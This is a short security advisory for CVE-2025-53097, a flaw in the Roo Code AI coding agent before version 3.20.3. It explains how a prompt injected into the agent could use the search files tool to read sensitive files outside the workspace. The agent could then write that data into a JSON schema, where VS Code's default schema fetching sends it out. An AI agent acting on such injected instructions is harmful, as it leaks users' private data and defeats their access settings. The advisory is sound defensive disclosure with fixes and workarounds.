CVE-2025-53097

Name of the Vulnerable Software and Affected Versions: Roo Code versions prior to 3.20.3

Description: The issue concerns the Roo Code agent's search files tool, which did not respect the setting to disable reads outside of the VS Code workspace. This allowed an attacker who could inject a prompt into the agent to potentially read a sensitive file and write the information to a JSON schema. The feature to fetch schemas is enabled by default in VS Code, and writing to the schema would trigger a network request without user intervention. The issue is of moderate severity, requiring the attacker to already be able to submit prompts to the agent.

Recommendations: For versions prior to 3.20.3, update to version 3.20.3 to resolve the issue where the search files tool did not respect the setting to limit it to the workspace. As a temporary workaround, consider disabling the search files tool or the schema fetching feature in VS Code to minimize the risk of exploitation.